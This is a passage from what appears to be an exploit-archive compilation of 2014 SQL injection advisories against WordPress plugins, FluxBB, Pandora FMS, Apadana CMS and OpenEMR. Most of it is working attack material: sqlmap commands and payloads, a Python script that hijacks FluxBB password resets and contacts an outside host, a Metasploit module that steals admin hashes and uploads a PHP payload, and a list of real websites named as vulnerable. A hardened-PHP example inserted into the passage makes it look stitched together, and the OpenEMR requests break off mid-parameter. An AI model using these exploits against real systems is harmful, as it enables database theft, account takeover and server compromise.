Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
function download_archive()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
        $return_file = "Account.zip";
        $zip         = new Zip();
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where uid = $user_ID  order by date desc", ARRAY_A);
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
 
    function remove_cat()
    {
        global $wpdb, $current_user;
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . "  ");
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . "  ");
}  
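All four entry points above concatenate request values straight into the query, and the id-based ones also act on whichever project id the caller supplies. As an added example that is not the plugin's code, the hardened handlers below use $wpdb->prepare() with one %d placeholder per value, reject non-integer input up front, and check capability and ownership before touching rows. It assumes it runs inside WordPress, where $wpdb, current_user_can() and get_current_user_id() exist, and reuses the sp_cu / sp_cu_project table names and the id, pid and uid columns quoted in the advisory; the upload_files capability is a placeholder for whatever role the plugin actually grants.

```php
<?php
// Added example, not SP Client Document Manager code. Safe replacements for the
// IN (...) list built from $_POST['vendor_email'] in email_vendor() and for the
// bare $_REQUEST['id'] used by remove_cat(). Assumes a loaded WordPress runtime.
declare(strict_types=1);

/**
 * Normalise a request value (scalar or array) into a list of positive integers.
 * Returns null if any element is not an integer, so callers fail closed.
 */
function sp_cdm_int_list($raw): ?array
{
    $values = is_array($raw) ? $raw : [$raw];
    $ids = [];
    foreach ($values as $v) {
        $n = filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($n === false) {
            return null;
        }
        $ids[] = $n;
    }
    return $ids === [] ? null : array_values(array_unique($ids));
}

/**
 * Build "IN (%d, %d, ...)" with exactly one placeholder per value, so the list
 * goes through $wpdb->prepare() instead of being concatenated into the SQL.
 */
function sp_cdm_in_clause(array $ids): string
{
    return 'IN (' . implode(', ', array_fill(0, count($ids), '%d')) . ')';
}

// Hardened email_vendor(): validated ids, bound placeholders, and a capability
// check so the AJAX endpoint is not usable anonymously. The capability name is
// a placeholder; use the role the plugin actually grants.
function sp_cdm_email_vendor_files(): array
{
    global $wpdb;
    if (!current_user_can('upload_files')) {
        return [];
    }
    $ids = sp_cdm_int_list($_POST['vendor_email'] ?? []);
    if ($ids === null) {
        return [];
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}sp_cu WHERE id " . sp_cdm_in_clause($ids),
        ...$ids
    );
    return $wpdb->get_results($sql, ARRAY_A) ?: [];
}

// Hardened remove_cat(): bound id, and the project must belong to the caller
// (sp_cu_project.uid, the column the advisory's download_project() reads).
function sp_cdm_remove_cat(): bool
{
    global $wpdb;
    $ids = sp_cdm_int_list($_REQUEST['id'] ?? null);
    if ($ids === null || count($ids) !== 1) {
        return false;
    }
    $id = $ids[0];
    $owner = $wpdb->get_var($wpdb->prepare(
        "SELECT uid FROM {$wpdb->prefix}sp_cu_project WHERE id = %d",
        $id
    ));
    if ($owner === null || (int) $owner !== get_current_user_id()) {
        return false;
    }
    $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu WHERE pid = %d", $id));
    $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu_project WHERE id = %d", $id));
    return true;
}
```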
 
 
::DISCLOSURE::
+ 10/30/2014: Notified vendor - vendor does not respond
+ 11/08/2014: Notified vendor - vendor blocks IPs from Vietnam
+ 11/05/2014: Notified vendor - vendor does not respond
+ 11/20/2014: Public disclosure
 
::REFERENCE::



 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.


WordPress wpDataTables 1.5.3 SQL Injection

######################
# Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
WordPress wpDataTables 1.5.3 and below suffers from an SQL injection vulnerability.
 
"table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
 
  /**
   * Handler which returns the AJAX response
   */
   function wdt_get_ajax_data(){
     $id = $_GET['table_id']; <------------------- Not Sanitized!
       $table_data = wdt_get_table_by_id( $id );
       $column_data = wdt_get_columns_by_table_id( $id );
       $column_headers = array();
       $column_types = array();
       $column_filtertypes = array();
       $column_inputtypes = array();
       foreach($column_data as $column){
           $column_order[(int)$column->pos] = $column->orig_header;
           if($column->display_header){
             $column_headers[$column->orig_header] = $column->display_header;
           }
           if($column->column_type != 'autodetect'){
             $column_types[$column->orig_header] = $column->column_type;
           }else{
             $column_types[$column->orig_header] = 'string';
           }  
           $column_filtertypes[$column->orig_header] = $column->filter_type;
           $column_inputtypes[$column->orig_header] = $column->input_type;
       }
------------------------
 
(The vulnerable variable is also used in other PHP files.)
 
######################
 
# PoC
 
http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
 
# Sqlmap
 
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
 
---
Parameter: table_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=get_wdtable&table_id=1 AND 9029=9029
 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
 
---
 
#####################
 
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
 
#####################


FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test' 
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
  if len(sql) > 80:
    sys.exit('SQL too long, max 80 chars')
  print "1st stage: %s (%d chars)" % (sql, len(sql))
  r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
  if 'An email has been sent to the specified address' not in r:
    sys.exit('err')
 
def stage3(key):
  print "3rd stage, using key: %s" % key
  r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
  if 'Your password has been updated' in r:
    print 'success'
  else:
    print 'err'
 
class stage2_smtp(smtpd.SMTPServer):
  def process_message(self, peer, mailfrom, rcpttos, data):
    print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
    key = re.search("(https?://.*&key=([^s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
    if key is not None: 
      raise asyncore.ExitNow(key.group(2))
    return
 
def login():
  print "logging in"
  r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
  try:
    t = r.info()['set-cookie'].split(';')[0]
    return (t.split('=')[1].split('%7C')[0], t)
  except:
    sys.exit('unable to login, check user/pass')
 
uid, cookie = login()
 
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
 
#this will change your password to your password :) 
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
 
#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
 
try:
  print "2nd stage: waiting for mail"
  server = stage2_smtp((bindip, 25), None)
  asyncore.loop()
except asyncore.ExitNow, key:
  stage3(key)



Pandora FMS SQL Injection Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Pandora FMS SQLi Remote Code Execution',
      'Description'    => %q{
        This module attempts to exploit multiple issues in order to gain remote
        code execution under Pandora FMS version <= 5.0 SP2.  First, an attempt
        to authenticate using default credentials is performed.  If this method
        fails, a SQL injection vulnerability is leveraged in order to extract
        the "Auto Login" password hash.  If this value is not set, the module
        will then extract the administrator account's MD5 password hash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
          'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
        ],
      'References'     =>
        [
          ['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
          ['URL', 'http://blog.pandorafms.org/?p=2041']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Pandora FMS version <= 5.0 SP2', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 50000,
          'DisableNops' => true,
        },
      'DisclosureDate' => "Feb 1 2014",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
          OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
          OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
        ], self.class)
  end
 
  def uri
    target_uri.path
  end
 
 
  def check
    vprint_status("#{peer} - Trying to detect installed version")
 
    version = nil
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'index.php')
    })
 
    if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
      if res.body =~ /<div id="ver_num">v(.*?)<\/div>/
        version = $1
      else
        return Exploit::CheckCode::Detected
      end
    end
 
    unless version.nil?
      vprint_status("#{peer} - Pandora FMS #{version} found")
      if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
        return Exploit::CheckCode::Appears
      end
    end
 
    Exploit::CheckCode::Safe
  end
 
 
  # Attempt to login with credentials (default admin:pandora)
  def authenticate
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'vars_get' => {
        'login' => "1",
      },
      'vars_post' => {
        'nick' => datastore['USER'],
        'pass' => datastore['PASS'],
        'Login' => 'Login',
      }
    })
 
    return auth_succeeded?(res)
  end
 
  # Attempt to login with auto login and SQLi
  def login_hash
    clue = rand_text_alpha(8)
    sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
    # select value from tconfig where token = 'loginhash_pwd';
    sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
    sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
    sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
    sqli << "BY x)a) AND 'msf'='msf"
 
    password = inject_sql(sqli, clue)
 
    if password && password.length != 0
      print_status("#{peer} - Extracted auto login password (#{password})")
    else
      print_error("#{peer} - No auto login password has been defined!")
      return false
    end
 
    print_status("#{peer} - Attempting to authenticate using (admin:#{password})")
    # Attempt to login using login hash password
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'vars_get' => {
        'loginhash' => 'auto',
      },
      'vars_post' => {
        'loginhash_data' => Rex::Text.md5("admin#{password}"),
        'loginhash_user' => 'admin',
      }
    })
 
    return auth_succeeded?(res)
  end
 
 
  def auth_succeeded?(res)
    if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
      print_status("#{peer} - Successfully authenticated!")
      print_status("#{peer} - Attempting to retrieve session cookie")
      @cookie = res.get_cookies
      if @cookie.include?('PHPSESSID')
        print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
        return true
      else
        print_error("#{peer} - Error retrieving cookie!")
      end
    else
      print_error("#{peer} - Authentication failed!")
    end
 
    false
  end
 
 
  def extract
    # Generate random string and convert to hex
    clue = rand_text_alpha(8)
    hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
 
    # select password from tusuario where id_user = 0;
    sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
    sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
    sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
    sqli << "x)a) AND 'msf'='msf"
 
    password = inject_sql(sqli, clue)
 
    if password && password.length != 0
      print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
    else
      print_error("#{peer} - Unable to extract password hash!")
      return false
    end
  end
 
 
  def inject_sql(sql, fence_post)
    # Extract password hash from database
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, 'mobile', 'index.php'),
      'vars_post' => {
        'action' => 'login',
        'user' => sql,
        'password' => 'pass',
        'input' => 'Login'
      }
    })
 
    result = nil
    if res && res.code == 200
      match = res.body.match(/(?<=#{fence_post})(.*)(?=#{fence_post})/)
      if match
        result = match[1]
      else
        print_error("#{peer} - SQL injection failed")
      end
    end
    result
  end
 
  def upload
    # Extract hash and hash2 from response
    res = send_request_cgi({
      'method' => 'GET',
      'cookie' => @cookie,
      'uri'    => normalize_uri(uri, 'index.php'),
      'vars_get' => {
        'sec' => 'gsetup',
        'sec2' => 'godmode/setup/file_manager'
      }
    })
 
    if res && res.code == 200 && res.body =~ /(?<=input type="submit" id="submit-go")(.*)(?=<input id="hidden-directory" name="directory" type="hidden")/
      form = $1
 
      # Extract hash
      if form =~ /(?<=name="hash" type="hidden"  value=")(.*?)(?=" />)/
        hash = $1
      else
        print_error("#{peer} - Could not extract hash from response!")
        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
      end
 
      # Extract hash2
      if form =~ /(?<=name="hash2" type="hidden"  value=")(.*?)(?=" />)/
        hash2 = $1
      else
        print_error("#{peer} - Could not extract hash2 from response!")
        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
      end
 
      # Extract real_directory
      if form =~ /(?<=name="real_directory" type="hidden"  value=")(.*?)(" />)/
        real_directory = $1
      else
        print_error("#{peer} - Could not extract real_directory from response!")
        fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
      end
    else
      print_error("#{peer} - Could not identify upload form!")
      fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
    end
 
 
    # Upload script
    @payload_name = "#{rand_text_alpha(8)}.php"
    post_data = Rex::MIME::Message.new
    post_data.add_part("<?php #{payload.encoded} ?>", 'text/plain', nil, %Q^form-data; name="file"; filename="#{@payload_name}"^)
    post_data.add_part('', nil, nil, 'form-data; name="unmask"')
    post_data.add_part('Go', nil, nil, 'form-data; name="go"')
    post_data.add_part(real_directory, nil, nil, 'form-data; name="real_directory"')
    post_data.add_part('images', nil, nil, 'form-data; name="directory"')
    post_data.add_part("#{hash}", nil, nil, 'form-data; name="hash"')
    post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"')
    post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"')
 
    print_status("#{peer} - Attempting to upload payload #{@payload_name}...")
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => @cookie,
      'uri'    => normalize_uri(uri, 'index.php'),
      'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s,
      'vars_get' => {
        'sec' => 'gsetup',
        'sec2' => 'godmode/setup/file_manager'
      }
    })
 
    if res && res.code == 200 && res.body.include?("Upload correct")
      register_file_for_cleanup(@payload_name)
      print_status("#{peer} - Successfully uploaded payload")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
    end
  end
 
 
  def exploit
    # First try to authenticate using default or user-supplied credentials
    print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
    auth = authenticate
 
    unless auth
      print_status("#{peer} - Attempting to extract auto login hash via SQLi")
      auth = login_hash
    end
 
    unless auth
      print_status("#{peer} - Attempting to extract admin password hash with SQLi")
      extract
      fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
    end
 
    print_status("#{peer} - Uploading PHP payload...")
    upload
 
    print_status("#{peer} - Executing payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'images', @payload_name),
      'cookie' => @cookie
    }, 1)
  end
end


Apadana CMS SQL Injection

[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0] Exploit Title : Apadana CMS SQL Injection Vulnerability
[0] Exploit Author : SeRaVo.BlackHat
[0] Vendor Homepage : http://www.apadanacms.ir/
[0] Google Dork : powered by apadana CMS
[0] Date: 2014/November/25
[0] Tested On : windows + linux | Mozilla | Havij
[0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]     :::       Apadana CMS Sql Injection Vulnerability    :::
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]     :::       Iranian Cyber ARmy ~ Iranian Black Hat     :::
[0]     ::::::::::::::::::::::::::::::::::::::::::::::::::::::::
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]
[0]
[0]     ::::::::::::::::
[0]     ::::: DEMO :::::
[0]     ::::::::::::::::
[0]
[0]          Location : http://Target.com/?a=posts&b=category&c=[SQL]
[0]
[0]
[0]     ::::::::::::::::
[0]     ::::: ERROR ::::
[0]     :::::::::::::::: 
[0]
[0]         http://wa-swimming.ir/?a=posts&b=category&c=20
[0]         http://wa-swimming.ir/?a=posts&b=category&c=20%27
[0]
[0]         http://beh-boshrooyeh.ir/?a=posts&b=102
[0]         http://beh-boshrooyeh.ir/?a=posts&b=102%27
[0]
[0]
[0]         http://www.kandimizbahloolabad.ir/?a=posts&b=1
[0]         http://www.kandimizbahloolabad.ir/?a=posts&b=1%27
[0]
[0]
[0]         http://padika.ir/?a=posts&b=category&c=1
[0]         http://padika.ir/?a=posts&b=category&c=1%27
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]  
[0]      
[0] Discovered by : SeRaVo.BlackHat [0] Hassan [0]
[0]  
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]  
[0]
[0] General.BlackHat@Gmail.com . FB.com/general.blackhat
[0]
[0] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK  + Milad.Hacking + Mr.Time
[0] SHD.N3T + MR.M@j!D + eb051 + Dr.SQ1 + Dr.3vil + RAMIN + ACC3SS + X3UR + 4li.BlackHat
[0] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + IraQeN-H4XORZ
[0] And All Iranian Cyber Army ....
[0]
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0]


OpenEMR 4.1.2(7) SQL Injection

----------1034262177
Content-Disposition: form-data; name="form_without"

on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"

5
----------1034262177
Content-Disposition: form-data; name="form_paydate"

5
----------1034262177
Content-Disposition: form-data; name="form_category"

All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain

boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"

5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"

5
----------1034262177
Content-Disposition: form-data; name="form_encounter"

5
----------1034262177
Content-Disposition: form-data; name="form_to_date"

5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"

2
----------1034262177
Content-Disposition: form-data; name="form_source"

5
----------1034262177
Content-Disposition: form-data; name="form_name"

BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"

Search
----------1034262177
Content-Disposition: form-data; name="form_date"

5-5-5
----------1034262177--

Request 6

GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

Request 7

POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0

form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4&form_from_date=0000-00-

Request 8

POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5&form_from_date=2014-07-25

Request 9

POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4&form_from_date=2014-07-25

Request 10

POST /openemr/interface/patient_file/deleter.php?patient=&encounterid=&formid=&issue=&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0

form_submit=Yes%2c+Delete+and+Log

Request 11

POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5

Request 12

POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

text=5&form_addr2=1&form_attn=5&form_country=U&form_freeb_type=2&form_phone=555-555-5555&form_partner=&form_name=P&form_zip=36&form_save=Save+as+New&form_state=W&form_city=W&form_cms_id=5

Request 14

POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6

form_pelist=%2f&form_pid=0&form_save=Save&form_key=e

Request 15

POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=&form_provider=1&form_apptstatus=&with_out_facility=on&form_facility=4&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date

Request 16

POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci

form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1 &form_i1subscriber_employer_country=USA&form_deceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_employer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_